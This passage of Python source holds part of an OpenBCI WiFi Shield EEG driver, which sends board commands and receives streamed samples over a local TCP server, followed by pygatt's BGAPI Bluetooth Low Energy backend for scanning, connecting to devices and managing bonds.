Start handling streaming data from the board. Call a provided callback
for every single sample that is processed
Args:
callback: A callback function -- or a list of functions -- that will receive a single argument of the
OpenBCISample object captured.
"""
self.timer_end = timeit.default_timer()
print('latency time : %.4f sec '%(self.timer_end-self.timer_start))
# Enclose callback function in a list if it comes alone
if not isinstance(callback, list):
            self.local_wifi_server.set_callback(callback)  # callback prints data in main()
else:
self.local_wifi_server.set_callback(callback[0])
if not self.streaming:
self.init_streaming()
# while self.streaming:
# # should the board get disconnected and we could not wait for notification anymore, a reco should be attempted through timeout mechanism
# try:
# # at most we will get one sample per packet
# self.waitForNotifications(1. / self.getSampleRate())
# except Exception as e:
# print("Something went wrong while waiting for a new sample: " + str(e))
# # retrieve current samples on the stack
# samples = self.delegate.getSamples()
# self.packets_dropped = self.delegate.getMaxPacketsDropped()
# if samples:
# self.time_last_packet = timeit.default_timer()
# for call in callback:
# for sample in samples:
# call(sample)
#
# if (lapse > 0 and timeit.default_timer() - start_time > lapse):
# self.stop();
# if self.log:
# self.log_packet_count = self.log_packet_count + 1;
#
# # Checking connection -- timeout and packets dropped
# self.check_connection()
def test_signal(self, signal):
""" Enable / disable test signal """
if signal == 0:
self.warn("Disabling synthetic square wave")
try:
self.wifi_write(']')
except Exception as e:
print("Something went wrong while setting signal: " + str(e))
elif signal == 1:
self.warn("Enabling synthetic square wave")
try:
self.wifi_write('[')
except Exception as e:
print("Something went wrong while setting signal: " + str(e))
else:
self.warn("%s is not a known test signal. Valid signal is 0-1" % signal)
    def set_channel(self, channel, toggle_position):
        """ Enable / disable channels """
        # Cyton SDK command characters, indexed by channel number (1-16).
        channels_on = list("!@#$%^&*QWERTYUI")
        channels_off = list("12345678qwertyui")
        try:
            if channel > self.num_channels:
                raise ValueError('Cannot set non-existent channel')
            # Commands to set toggle to on / off position
            if toggle_position == 1:
                self.wifi_write(channels_on[channel - 1])
            elif toggle_position == 0:
                self.wifi_write(channels_off[channel - 1])
        except Exception as e:
            print("Something went wrong while setting channels: " + str(e))
# See Cyton SDK for options
def set_channel_settings(self, channel, enabled=True, gain=24, input_type=0, include_bias=True, use_srb2=True, use_srb1=True):
try:
if channel > self.num_channels:
                raise ValueError('Cannot set non-existent channel')
if self.board_type == k.BOARD_GANGLION:
raise ValueError('Cannot use with Ganglion')
ch_array = list("12345678QWERTYUI")
#defaults
command = list("x1060110X")
# Set channel
command[1] = ch_array[channel-1]
# Set power down if needed (default channel enabled)
if not enabled:
command[2] = '1'
# Set gain (default 24)
if gain == 1:
command[3] = '0'
if gain == 2:
command[3] = '1'
if gain == 4:
command[3] = '2'
if gain == 6:
command[3] = '3'
if gain == 8:
command[3] = '4'
if gain == 12:
command[3] = '5'
#TODO: Implement input type (default normal)
# Set bias inclusion (default include)
if not include_bias:
command[5] = '0'
# Set srb2 use (default use)
if not use_srb2:
command[6] = '0'
            # Set srb1 use (board default is off; note use_srb1 defaults to True here)
            if use_srb1:
                command[7] = '1'
command_send = ''.join(command)
self.wifi_write(command_send)
#Make sure to update gain in wifi
self.gains[channel-1] = gain
self.local_wifi_server.set_gains(gains=self.gains)
self.local_wifi_server.set_parser(ParseRaw(gains=self.gains, board_type=self.board_type))
except ValueError as e:
print("Something went wrong while setting channel settings: " + str(e))
def set_sample_rate(self, sample_rate):
""" Change sample rate """
try:
if self.board_type == k.BOARD_CYTON or self.board_type == k.BOARD_DAISY:
if sample_rate == 250:
self.wifi_write('~6')
elif sample_rate == 500:
self.wifi_write('~5')
elif sample_rate == 1000:
self.wifi_write('~4')
elif sample_rate == 2000:
self.wifi_write('~3')
elif sample_rate == 4000:
self.wifi_write('~2')
elif sample_rate == 8000:
self.wifi_write('~1')
elif sample_rate == 16000:
self.wifi_write('~0')
else:
print("Sample rate not supported: " + str(sample_rate))
elif self.board_type == k.BOARD_GANGLION:
if sample_rate == 200:
self.wifi_write('~7')
elif sample_rate == 400:
self.wifi_write('~6')
elif sample_rate == 800:
self.wifi_write('~5')
elif sample_rate == 1600:
self.wifi_write('~4')
elif sample_rate == 3200:
self.wifi_write('~3')
elif sample_rate == 6400:
self.wifi_write('~2')
elif sample_rate == 12800:
self.wifi_write('~1')
elif sample_rate == 25600:
self.wifi_write('~0')
else:
print("Sample rate not supported: " + str(sample_rate))
else:
print("Board type not supported for setting sample rate")
except Exception as e:
print("Something went wrong while setting sample rate: " + str(e))
def set_accelerometer(self, toggle_position):
""" Enable / disable accelerometer """
try:
if self.board_type == k.BOARD_GANGLION:
# Commands to set toggle to on position
if toggle_position == 1:
self.wifi_write('n')
# Commands to set toggle to off position
elif toggle_position == 0:
self.wifi_write('N')
else:
print("Board type not supported for setting accelerometer")
except Exception as e:
print("Something went wrong while setting accelerometer: " + str(e))
"""
Clean Up (atexit)
"""
def stop(self):
print("Stop streaming...")
self.streaming = False
# connection might be already down here
try:
if self.impedance:
print("Stopping with impedance testing")
self.wifi_write('Z')
else:
self.wifi_write('s')
except Exception as e:
print("Something went wrong while asking the board to stop streaming: " + str(e))
if self.log:
logging.warning('sent <s>: stopped streaming')
print('save recording...')
np.save('recording', self.local_wifi_server.handler.records)
def disconnect(self):
if self.streaming:
self.stop()
# should not try to read/write anything after that, will crash
"""
SETTINGS AND HELPERS
"""
def warn(self, text):
if self.log:
            # log how many packets were sent successfully in between warnings
if self.log_packet_count:
logging.info('Data packets received:' + str(self.log_packet_count))
self.log_packet_count = 0
logging.warning(text)
print("Warning: %s" % text)
def check_connection(self):
""" Check connection quality in term of lag and number of packets drop. Reinit connection if necessary. FIXME: parameters given to the board will be lost."""
# stop checking when we're no longer streaming
if not self.streaming:
return
# check number of dropped packets and duration without new packets, deco/reco if too large
if self.packets_dropped > self.max_packets_to_skip:
self.warn("Too many packets dropped, attempt to reconnect")
self.reconnect()
elif self.timeout > 0 and timeit.default_timer() - self.time_last_packet > self.timeout:
self.warn("Too long since got new data, attempt to reconnect")
            # if error, attempt to reconnect
self.reconnect()
def reconnect(self):
""" In case of poor connection, will shut down and relaunch everything. FIXME: parameters given to the board will be lost."""
self.warn('Reconnecting')
self.stop()
self.disconnect()
self.connect()
self.init_streaming()
class WiFiShieldHandler(asyncore.dispatcher_with_send):
def __init__(self, sock, callback=None, high_speed=True,
parser=None, daisy=False):
asyncore.dispatcher_with_send.__init__(self, sock)
self.callback = callback
self.daisy = daisy
self.high_speed = high_speed
self.last_odd_sample = OpenBCISample()
self.parser = parser if parser is not None else ParseRaw(gains=[24, 24, 24, 24, 24, 24, 24, 24])
self.records = np.zeros(16)
def handle_read(self):
# recv is from asyncore recv(buffer_size)
#print('i am in handle_read')
data = self.recv(3000) # 3000 is the max data the WiFi shield is allowed to send over TCP
if len(data) > 2:
if self.high_speed:
                packets = len(data) // k.RAW_PACKET_SIZE  # 33-byte raw packets
raw_data_packets = []
for i in range(packets):
raw_data_packets.append(bytearray(data[i * k.RAW_PACKET_SIZE: i * k.RAW_PACKET_SIZE + k.RAW_PACKET_SIZE]))
# where is transform_raw_data_packets_to_sample function?
samples = self.parser.transform_raw_data_packets_to_sample(raw_data_packets=raw_data_packets)
for sample in samples:
# if a daisy module is attached, wait to concatenate two samples (main board + daisy)
# before passing it to callback
print(sample.sample_number, np.array(sample.channel_data))
if self.daisy:
                        # even sample number: first half of the pair, save for later
                        if ~sample.sample_number % 2:
                            self.last_odd_sample = sample
                        # odd sample number: concatenate and send if the saved sample
                        # was this one's predecessor, otherwise drop the packet
elif sample.sample_number - 1 == self.last_odd_sample.sample_number:
# the aux data will be the average between the two samples, as the channel
# samples themselves have been averaged by the board
daisy_sample = self.parser.make_daisy_sample_object_wifi(self.last_odd_sample, sample)
print('daisy', daisy_sample.sample_number,np.array(daisy_sample.channel_data))
#self.records = np.vstack((self.records,np.array(daisy_sample.channel_data)))
if self.callback is not None:
self.callback(daisy_sample)####
else:
if self.callback is not None:
self.callback(sample)
else:
try:
                    possible_chunks = data.decode('utf-8', errors='replace').split('\r\n')
if len(possible_chunks) > 1:
possible_chunks = possible_chunks[:-1]
for possible_chunk in possible_chunks:
if len(possible_chunk) > 2:
chunk_dict = json.loads(possible_chunk)
if 'chunk' in chunk_dict:
for sample in chunk_dict['chunk']:
if self.callback is not None:
self.callback(sample)
else:
print("not a sample packet")
except ValueError as e:
print("failed to parse: %s" % data)
print(e)
except BaseException as e:
print(e)
class WiFiShieldServer(asyncore.dispatcher):#server
def __init__(self, host, port, callback=None, gains=None, high_speed=True, daisy=False):
asyncore.dispatcher.__init__(self)
self.create_socket(socket.AF_INET, socket.SOCK_STREAM)
self.set_reuse_addr()
self.bind((host, port))
self.daisy = daisy
self.listen(5)
        self.callback = callback
self.handler = None
self.parser = ParseRaw(gains=gains)
self.high_speed = high_speed
def handle_accept(self):
pair = self.accept()
if pair is not None:
sock, addr = pair
print('Incoming connection from %s' % repr(addr))
self.handler = WiFiShieldHandler(sock, self.callback, high_speed=self.high_speed,
parser=self.parser, daisy=self.daisy)
def set_callback(self, callback):
self.callback = callback
if self.handler is not None:
self.handler.callback = callback #print Data in main()
def set_daisy(self, daisy):
self.daisy = daisy
if self.handler is not None:
self.handler.daisy = daisy
def set_gains(self, gains):
self.parser.set_ads1299_scale_factors(gains)
def set_parser(self, parser):
self.parser = parser
if self.handler is not None:
self.handler.parser = parser
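if __name__ == '__main__':
    # Minimal usage sketch (illustrative; assumes a WiFi Shield is reachable
    # via SSDP on the local network).
    def _print_sample(sample):
        print(sample.sample_number, sample.channel_data)

    shield = OpenBCIWiFi(ip_address=None, sample_rate=250)
    shield.start_streaming(_print_sample)
    shield.loop()  # run the asyncore event loop; blocks while samples stream in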
|
bgapi.py
|
from __future__ import print_function
# for Python 2/3 compatibility
try:
import queue
except ImportError:
import Queue as queue
import logging
import serial
import time
import threading
from binascii import hexlify, unhexlify
from uuid import UUID
from enum import Enum
from collections import defaultdict
from pygatt.exceptions import NotConnectedError
from pygatt.backends import BLEBackend, Characteristic, BLEAddressType
from pygatt.util import uuid16_to_uuid
from . import bglib, constants
from .exceptions import BGAPIError, ExpectedResponseTimeout
from .device import BGAPIBLEDevice
from .bglib import EventPacketType, ResponsePacketType
from .packets import BGAPICommandPacketBuilder as CommandBuilder
from .error_codes import get_return_message
from .util import find_usb_serial_devices
try:
import termios
except ImportError:
# Running in Windows (not Linux/OS X/Cygwin)
serial_exception = RuntimeError
else:
serial_exception = termios.error
log = logging.getLogger(__name__)
BLED112_VENDOR_ID = 0x2458
BLED112_PRODUCT_ID = 0x0001
MAX_CONNECTION_ATTEMPTS = 10
UUIDType = Enum('UUIDType', ['custom', 'service', 'attribute',
'descriptor', 'characteristic',
'nonstandard'])
def _timed_out(start_time, timeout):
return time.time() - start_time > timeout
def bgapi_address_to_hex(address):
address = hexlify(bytearray(
list(reversed(address)))).upper().decode('ascii')
return ':'.join(''.join(pair) for pair in zip(*[iter(address)] * 2))
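# Example (illustrative): BGAPI transmits addresses little-endian, so
# bgapi_address_to_hex(b'\xab\x89\x67\x45\x23\x01') == '01:23:45:67:89:AB'.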
class AdvertisingAndScanInfo(object):
"""
Holds the advertising and scan response packet data from a device at a given
address.
"""
def __init__(self):
self.name = ""
self.address = ""
self.rssi = None
self.packet_data = {
# scan_response_packet_type[xxx]: data_dictionary,
}
class BGAPIBackend(BLEBackend):
"""
A BLE backend for a BGAPI compatible USB adapter.
"""
def __init__(self, serial_port=None, receive_queue_timeout=0.1):
"""
Initialize the backend, but don't start the USB connection yet. Must
call .start().
serial_port -- The name of the serial port for the BGAPI-compatible
USB interface. If not provided, will attempt to auto-detect.
"""
self._lib = bglib.BGLib()
self._serial_port = serial_port
self._receive_queue_timeout = receive_queue_timeout
self._ser = None
self._receiver = None
self._running = None
self._lock = threading.Lock()
# buffer for packets received
self._receiver_queue = queue.Queue()
# State
self._num_bonds = 0 # number of bonds stored on the adapter
self._stored_bonds = [] # bond handles stored on the adapter
self._devices_discovered = {
# 'address': AdvertisingAndScanInfo,
# Note: address formatted like "01:23:45:67:89:AB"
}
self._characteristics = defaultdict(dict)
self._connections = {}
self._current_characteristic = None # used in char/descriptor discovery
self._packet_handlers = {
ResponsePacketType.sm_get_bonds: self._ble_rsp_sm_get_bonds,
EventPacketType.attclient_attribute_value: (
self._ble_evt_attclient_attribute_value),
EventPacketType.attclient_find_information_found: (
self._ble_evt_attclient_find_information_found),
EventPacketType.connection_status: self._ble_evt_connection_status,
EventPacketType.connection_disconnected: (
self._ble_evt_connection_disconnected),
EventPacketType.gap_scan_response: self._ble_evt_gap_scan_response,
EventPacketType.sm_bond_status: self._ble_evt_sm_bond_status,
}
log.debug("Initialized new BGAPI backend")
def _detect_device_port(self):
log.debug("Auto-detecting serial port for BLED112")
detected_devices = find_usb_serial_devices(
vendor_id=BLED112_VENDOR_ID,
product_id=BLED112_PRODUCT_ID)
if len(detected_devices) == 0:
raise BGAPIError("Unable to auto-detect BLED112 serial port")
log.info("Found BLED112 on serial port %s",
detected_devices[0].port_name)
return detected_devices[0].port_name
def _open_serial_port(self,
max_connection_attempts=MAX_CONNECTION_ATTEMPTS):
"""
Open a connection to the named serial port, or auto-detect the first
port matching the BLED device. This will wait until data can actually be
read from the connection, so it will not return until the device is
fully booted.
max_connection_attempts -- Max number of times to retry
detecting and connecting to a device.
Raises a NotConnectedError if the device cannot connect after 10
attempts, with a short pause in between each attempt.
"""
for attempt in range(max_connection_attempts):
log.debug("Opening connection to serial port (attempt %d)",
attempt + 1)
try:
serial_port = self._serial_port or self._detect_device_port()
self._ser = None
self._ser = serial.Serial(serial_port, baudrate=115200,
timeout=0.25)
# Wait until we can actually read from the device
self._ser.read()
break
except (BGAPIError, serial.serialutil.SerialException,
serial_exception):
log.debug("Failed to open serial port", exc_info=True)
if self._ser:
self._ser.close()
elif attempt == 0:
raise NotConnectedError(
"No BGAPI compatible device detected")
self._ser = None
time.sleep(0.25)
else:
raise NotConnectedError("Unable to reconnect with USB "
"device after rebooting")
def _initialize_device(self, reset=True):
""" Prepare an opened BGAPI device for use """
self._receiver = threading.Thread(target=self._receive)
self._receiver.daemon = True
self._running = threading.Event()
self._running.set()
self._receiver.start()
# Stop any ongoing procedure
log.debug("Stopping any outstanding GAP procedure")
self.send_command(CommandBuilder.gap_end_procedure())
try:
self.expect(ResponsePacketType.gap_end_procedure)
except BGAPIError:
# Ignore any errors if there was no GAP procedure running
pass
self.disable_advertising(skip_reply=not reset)
self.set_bondable(False)
# Check to see if there are any existing connections and add them
# Request the number of currently connected modules from the adapter
self.send_command(CommandBuilder.system_get_connections())
_, connections = self.expect(ResponsePacketType.system_get_connections)
# Adapter should also generate one EventPacketType.connection_status
# for each supported connection
for _ in range(connections['maxconn']):
_, conn = self.expect(EventPacketType.connection_status)
# If any connection flags are set, this is an active connection
if conn['flags'] > 0:
# Create new ble object to insert into the adapter
ble = BGAPIBLEDevice(bgapi_address_to_hex(conn['address']),
conn['connection_handle'],
self)
# pylint: disable=protected-access
self._connections[conn['connection_handle']] = ble
def start(self, reset=True, tries=5):
"""
        Connect to the USB adapter, reset its state and start a background
receiver thread.
"""
if self._running and self._running.is_set():
self.stop()
# Fail immediately if no device is attached, don't retry waiting for one
# to be plugged in.
self._open_serial_port(max_connection_attempts=1)
if reset:
log.debug("Resetting and reconnecting to device for a clean environment")
# Blow everything away and start anew.
# Only way to be sure is to burn it down and start again.
# (Aka reset remote state machine)
# Note: Could make this a conditional based on parameter if this
# happens to be too slow on some systems.
# The zero param just means we want to do a normal restart instead of
# starting a firmware update restart.
self.send_command(CommandBuilder.system_reset(0))
self._ser.flush()
self._ser.close()
# Re-open the port. On Windows, it has been observed that the
            # port is not immediately available - so retry for up to 2 seconds.
            start = time.time()
retry_t = 0.2
while True:
try:
self._open_serial_port()
                except Exception:
                    if time.time() - start > 2:
raise
else:
log.debug('Port not ready, retry in %.2f seconds...' % retry_t)
time.sleep(retry_t)
else:
break
if tries is None or not tries:
# Try at least once to open the port
tries = 1
# Sometimes when opening the port without a reset, it'll fail to respond
# So let's try to repeat the initialization process a few times
while tries:
tries -= 1
try:
self._initialize_device(reset)
return
except ExpectedResponseTimeout:
if tries:
log.info("BLED unresponsive, re-opening")
self.stop()
self._open_serial_port(max_connection_attempts=1)
continue
# If we got here, we failed to open the port
raise NotConnectedError()
def stop(self):
for device in self._connections.values():
try:
device.disconnect()
except NotConnectedError:
pass
if self._running:
if self._running.is_set():
log.debug('Stopping')
self._running.clear()
if self._receiver:
self._receiver.join()
self._receiver = None
if self._ser:
self._ser.close()
self._ser = None
def set_bondable(self, bondable):
self.send_command(
CommandBuilder.sm_set_bondable_mode(
constants.bondable['yes' if bondable else 'no']))
self.expect(ResponsePacketType.sm_set_bondable_mode)
def disable_advertising(self, skip_reply=False):
log.debug("Disabling advertising")
self.send_command(
CommandBuilder.gap_set_mode(
constants.gap_discoverable_mode['non_discoverable'],
constants.gap_connectable_mode['non_connectable']))
if not skip_reply:
self.expect(ResponsePacketType.gap_set_mode)
def send_command(self, *args, **kwargs):
with self._lock:
if self._ser is None:
log.warn("Unexpectedly not connected to USB device")
raise NotConnectedError()
return self._lib.send_command(self._ser, *args, **kwargs)
def clear_bond(self, address=None):
"""
Delete the bonds stored on the adapter.
address - the address of the device to unbond. If not provided, will
erase all bonds.
Note: this does not delete the corresponding bond stored on the remote
device.
"""
# Find bonds
log.debug("Fetching existing bonds for devices")
self._stored_bonds = []
self.send_command(CommandBuilder.sm_get_bonds())
try:
self.expect(ResponsePacketType.sm_get_bonds)
except NotConnectedError:
pass
if self._num_bonds == 0:
return
while len(self._stored_bonds) < self._num_bonds:
self.expect(EventPacketType.sm_bond_status)
for b in reversed(self._stored_bonds):
log.debug("Deleting bond %s", b)
self.send_command(CommandBuilder.sm_delete_bonding(b))
self.expect(ResponsePacketType.sm_delete_bonding)
def scan(self, timeout=10, scan_interval=75, scan_window=50, active=True,
discover_mode=constants.gap_discover_mode['observation'],
**kwargs):
"""
Perform a scan to discover BLE devices.
timeout -- the number of seconds this scan should last.
        scan_interval -- the number of milliseconds until scanning is restarted.
        scan_window -- the number of milliseconds the scanner will listen on one
frequency for advertisement packets.
active -- True --> ask sender for scan response data. False --> don't.
discover_mode -- one of the gap_discover_mode constants.
"""
parameters = 1 if active else 0
# NOTE: the documentation seems to say that the times are in units of
# 625us but the ranges it gives correspond to units of 1ms....
self.send_command(
CommandBuilder.gap_set_scan_parameters(
scan_interval, scan_window, parameters
))
self.expect(ResponsePacketType.gap_set_scan_parameters)
log.debug("Starting an %s scan", "active" if active else "passive")
self.send_command(CommandBuilder.gap_discover(discover_mode))
self.expect(ResponsePacketType.gap_discover)
log.debug("Pausing for %ds to allow scan to complete", timeout)
time.sleep(timeout)
log.debug("Stopping scan")
self.send_command(CommandBuilder.gap_end_procedure())
self.expect(ResponsePacketType.gap_end_procedure)
devices = []
for address, info in self._devices_discovered.items():
devices.append({
'address': address,
'name': info.name,
'rssi': info.rssi,
'packet_data': info.packet_data
})
log.debug("Discovered %d devices: %s", len(devices), devices)
self._devices_discovered = {}
return devices
def _end_procedure(self):
self.send_command(CommandBuilder.gap_end_procedure())
self.expect(ResponsePacketType.gap_end_procedure)
def connect(self, address, timeout=5,
address_type=BLEAddressType.public,
interval_min=60, interval_max=76, supervision_timeout=100,
latency=0):
"""
        Connect directly to a device at the given BLE address, then discover
        and store the characteristic and characteristic descriptor handles.
Requires that the adapter is not connected to a device already.
address -- a bytearray containing the device mac address.
timeout -- number of seconds to wait before returning if not connected.
address_type -- one of BLEAddressType's values, either public or random.
Raises BGAPIError or NotConnectedError on failure.
"""
address_bytes = bytearray(unhexlify(address.replace(":", "")))
for device in self._connections.values():
if device._address == bgapi_address_to_hex(address_bytes):
return device
log.debug("Connecting to device at address %s (timeout %ds)",
address, timeout)
self.set_bondable(False)
if address_type == BLEAddressType.public:
addr_type = constants.ble_address_type['gap_address_type_public']
else:
addr_type = constants.ble_address_type['gap_address_type_random']
self.send_command(
CommandBuilder.gap_connect_direct(
address_bytes, addr_type, interval_min, interval_max,
supervision_timeout, latency))
try:
self.expect(ResponsePacketType.gap_connect_direct)
_, packet = self.expect(EventPacketType.connection_status,
timeout=timeout)
# TODO what do we do if the status isn't 'connected'? Retry?
# Raise an exception? Should also check the address matches the
# expected TODO i'm finding that when reconnecting to the same
            # MAC, we get a connection status of "disconnected" but that is
# picked up here as "connected", then we don't get anything
# else.
if self._connection_status_flag(
packet['flags'],
constants.connection_status_flag['connected']):
device = BGAPIBLEDevice(
bgapi_address_to_hex(packet['address']),
packet['connection_handle'],
self)
if self._connection_status_flag(
packet['flags'],
constants.connection_status_flag['encrypted']):
device.encrypted = True
self._connections[packet['connection_handle']] = device
log.info("Connected to %s", address)
return device
except ExpectedResponseTimeout:
# If the connection doesn't occur because the device isn't there
# then you should manually stop the command.
#
# If we never get the connection status it is likely that it
# didn't occur because the device isn't there. If that is true
# then we have to manually stop the command.
self._end_procedure()
exc = NotConnectedError()
exc.__cause__ = None
raise exc
def discover_characteristics(self, connection_handle):
att_handle_start = 0x0001 # first valid handle
att_handle_end = 0xFFFF # last valid handle
log.debug("Fetching characteristics for connection %d",
connection_handle)
self.send_command(
CommandBuilder.attclient_find_information(
connection_handle, att_handle_start, att_handle_end))
self.expect(ResponsePacketType.attclient_find_information)
self.expect(EventPacketType.attclient_procedure_completed,
timeout=10)
for char_uuid_str, char_obj in (
self._characteristics[connection_handle].items()):
log.debug("Characteristic 0x%s is handle 0x%x",
char_uuid_str, char_obj.handle)
for desc_uuid_str, desc_handle in (
char_obj.descriptors.items()):
log.debug("Characteristic descriptor 0x%s is handle 0x%x",
desc_uuid_str, desc_handle)
return self._characteristics[connection_handle]
@staticmethod
def _connection_status_flag(flags, flag_to_find):
"""
Is the given flag in the connection status flags?
flags -- the 'flags' parameter returned by ble_evt_connection_status.
flag_to_find -- the flag to look for in flags.
Returns true if flag_to_find is in flags. Returns false otherwise.
"""
return (flags & flag_to_find) == flag_to_find
@staticmethod
def _get_uuid_type(uuid):
"""
Checks if the UUID is a custom 128-bit UUID or a GATT characteristic
descriptor UUID.
uuid -- the UUID as a bytearray.
Return a UUIDType.
"""
if len(uuid) == 16: # 128-bit --> 16 byte
return UUIDType.custom
if uuid in constants.gatt_service_uuid.values():
return UUIDType.service
if uuid in constants.gatt_attribute_type_uuid.values():
return UUIDType.attribute
if uuid in constants.gatt_characteristic_descriptor_uuid.values():
return UUIDType.descriptor
if uuid in constants.gatt_characteristic_type_uuid.values():
return UUIDType.characteristic
log.warn("Unrecognized 4 byte UUID %s", hexlify(uuid))
return UUIDType.nonstandard
def _scan_rsp_data(self, data):
"""
Parse scan response data.
Note: the data will come in a format like the following:
[data_length, data_type, data..., data_length, data_type, data...]
data -- the args['data'] list from _ble_evt_scan_response.
        Returns a name and a dictionary containing the parsed data in pairs of
        'field_name': value.
"""
# Result stored here
data_dict = {
# 'name': value,
}
bytes_left_in_field = 0
field_name = None
field_value = []
# Iterate over data bytes to put in field
dev_name = ""
for b in data:
if bytes_left_in_field == 0:
# New field
bytes_left_in_field = b
field_value = []
else:
field_value.append(b)
bytes_left_in_field -= 1
if bytes_left_in_field == 0:
# End of field
field_name = (
constants.scan_response_data_type[field_value[0]])
field_value = field_value[1:]
# Field type specific formats
if (field_name == 'complete_local_name' or
field_name == 'shortened_local_name'):
dev_name = bytearray(field_value).decode("utf-8")
data_dict[field_name] = dev_name
elif (field_name ==
'complete_list_128-bit_service_class_uuids'):
if len(field_value) % 16 == 0: # 16 bytes
data_dict[field_name] = []
for i in range(0, int(len(field_value) / 16)):
service_uuid = (
"0x%s" %
bgapi_address_to_hex(
field_value[i * 16:i * 16 + 16]))
data_dict[field_name].append(service_uuid)
else:
log.warning("Expected a service class UUID of 16\
bytes. Instead received %d bytes",
len(field_value))
else:
data_dict[field_name] = bytearray(field_value)
return dev_name, data_dict
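    # Example (illustrative): the payload [6, 0x09] + list(b'Hello') is one
    # field of length 6 whose type byte 0x09 should map to
    # 'complete_local_name' in constants.scan_response_data_type, so
    # _scan_rsp_data would return ('Hello', {'complete_local_name': 'Hello'}).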
def expect(self, expected, *args, **kargs):
return self.expect_any([expected], *args, **kargs)
def expect_any(self, expected_packet_choices, timeout=None,
assert_return_success=True):
"""
Process packets until a packet of one of the expected types is found.
expected_packet_choices -- a list of BGLib.PacketType.xxxxx. Upon
processing a packet of a type contained in
the list, this function will return.
timeout -- maximum time in seconds to process packets.
assert_return_success -- raise an exception if the return code from a
matched message is non-zero.
Raises an ExpectedResponseTimeout if one of the expected responses is
        not received within the time limit.
"""
timeout = timeout or 1
log.debug("Expecting a response of one of %s within %fs",
expected_packet_choices, timeout or 0)
start_time = None
if timeout is not None:
start_time = time.time()
while True:
packet = None
try:
packet = self._receiver_queue.get(
timeout=self._receive_queue_timeout)
except queue.Empty:
if timeout is not None:
if _timed_out(start_time, timeout):
exc = ExpectedResponseTimeout(
expected_packet_choices, timeout)
exc.__cause__ = None
raise exc
continue
if packet is None:
raise ExpectedResponseTimeout(expected_packet_choices, timeout)
packet_type, response = self._lib.decode_packet(packet)
return_code = response.get('result', 0)
log.debug("Received a %s packet: %s",
packet_type, get_return_message(return_code))
if packet_type in self._packet_handlers:
self._packet_handlers[packet_type](response)
if packet_type in expected_packet_choices:
return packet_type, response
def _receive(self):
"""
        Read bytes from serial and enqueue each complete parsed packet.
Stops if the self._running event is not set.
"""
log.debug("Running receiver")
while self._running.is_set():
packet = self._lib.parse_byte(self._ser.read())
if packet is not None:
decoded = self._lib.decode_packet(packet)
if decoded is None:
continue
packet_type, args = decoded
if packet_type == EventPacketType.attclient_attribute_value and\
args['connection_handle'] in self._connections:
device = self._connections[args['connection_handle']]
device.receive_notification(args['atthandle'],
bytearray(args['value']))
self._receiver_queue.put(packet)
log.debug("Stopping receiver")
def _ble_evt_attclient_attribute_value(self, args):
"""
Handles the event for values of characteristics.
args -- dictionary containing the attribute handle ('atthandle'),
attribute type ('type'), and attribute value ('value')
"""
log.debug("attribute handle = %x", args['atthandle'])
log.debug("attribute type = %x", args['type'])
log.debug("attribute value = 0x%s", hexlify(bytearray(args['value'])))
def _ble_evt_attclient_find_information_found(self, args):
"""
        Handles the event for characteristic discovery.
Adds the characteristic to the dictionary of characteristics or adds
the descriptor to the dictionary of descriptors in the current
        characteristic. These events will occur in an order similar to the
following:
1) primary service uuid
2) 0 or more descriptors
3) characteristic uuid
4) 0 or more descriptors
5) repeat steps 3-4
args -- dictionary containing the characteristic handle ('chrhandle'),
and characteristic UUID ('uuid')
"""
raw_uuid = bytearray(reversed(args['uuid']))
# Convert 4-byte UUID shorthand to a full, 16-byte UUID
uuid_type = self._get_uuid_type(raw_uuid)
if uuid_type != UUIDType.custom:
uuid = uuid16_to_uuid(int(
bgapi_address_to_hex(args['uuid']).replace(':', ''), 16))
else:
uuid = UUID(bytes=bytes(raw_uuid))
# TODO is there a way to get the characteristic from the packet instead
# of having to track the "current" characteristic?
if (uuid_type == UUIDType.descriptor and
self._current_characteristic is not None):
self._current_characteristic.add_descriptor(uuid, args['chrhandle'])
elif (uuid_type == UUIDType.custom or
uuid_type == UUIDType.nonstandard or
uuid_type == UUIDType.characteristic):
if uuid_type == UUIDType.custom:
log.debug("Found custom characteristic %s" % uuid)
elif uuid_type == UUIDType.characteristic:
log.debug("Found approved characteristic %s" % uuid)
elif uuid_type == UUIDType.nonstandard:
log.debug("Found nonstandard 4-byte characteristic %s" % uuid)
new_char = Characteristic(uuid, args['chrhandle'])
self._current_characteristic = new_char
self._characteristics[
args['connection_handle']][uuid] = new_char
def _ble_evt_connection_disconnected(self, args):
"""
Handles the event for the termination of a connection.
"""
self._connections.pop(args['connection_handle'], None)
def _ble_evt_connection_status(self, args):
"""
Handles the event for reporting connection status.
args -- dictionary containing the connection status flags ('flags'),
device address ('address'), device address type ('address_type'),
connection interval ('conn_interval'), connection timeout
            ('timeout'), device latency ('latency'), device bond handle
('bonding')
"""
connection_handle = args['connection_handle']
if not self._connection_status_flag(
args['flags'],
constants.connection_status_flag['connected']):
# Disconnected
self._connections.pop(connection_handle, None)
log.debug("Connection status: handle=0x%x, flags=%s, address=0x%s, "
"connection interval=%fms, timeout=%d, "
"latency=%d intervals, bonding=0x%x",
connection_handle,
args['address'],
hexlify(bytearray(args['address'])),
args['conn_interval'] * 1.25,
args['timeout'] * 10,
args['latency'],
args['bonding'])
def _ble_evt_gap_scan_response(self, args):
"""
Handles the event for reporting the contents of an advertising or scan
response packet.
This event will occur during device discovery but not direct connection.
args -- dictionary containing the RSSI value ('rssi'), packet type
('packet_type'), address of packet sender ('sender'), address
type ('address_type'), existing bond handle ('bond'), and
            scan response data list ('data')
"""
# Parse packet
packet_type = constants.scan_response_packet_type[args['packet_type']]
address = bgapi_address_to_hex(args['sender'])
name, data_dict = self._scan_rsp_data(args['data'])
# Store device information
if address not in self._devices_discovered:
self._devices_discovered[address] = AdvertisingAndScanInfo()
dev = self._devices_discovered[address]
if dev.name == "":
dev.name = name
if dev.address == "":
dev.address = address
if (packet_type not in dev.packet_data or
len(dev.packet_data[packet_type]) < len(data_dict)):
dev.packet_data[packet_type] = data_dict
dev.rssi = args['rssi']
log.debug("Received a scan response from %s with rssi=%d dBM "
"and data=%s", address, args['rssi'], data_dict)
def _ble_evt_sm_bond_status(self, args):
"""
Handles the event for reporting a stored bond.
Adds the stored bond to the list of bond handles.
args -- dictionary containing the bond handle ('bond'), encryption key
size used in the long-term key ('keysize'), was man in the
middle used ('mitm'), keys stored for bonding ('keys')
"""
# Add to list of stored bonds found or set flag
self._stored_bonds.append(args['bond'])
def _ble_rsp_sm_delete_bonding(self, args):
"""
Handles the response for the deletion of a stored bond.
args -- dictionary containing the return code ('result')
"""
result = args['result']
if result == 0:
self._stored_bonds.pop()
return result
def _ble_rsp_sm_get_bonds(self, args):
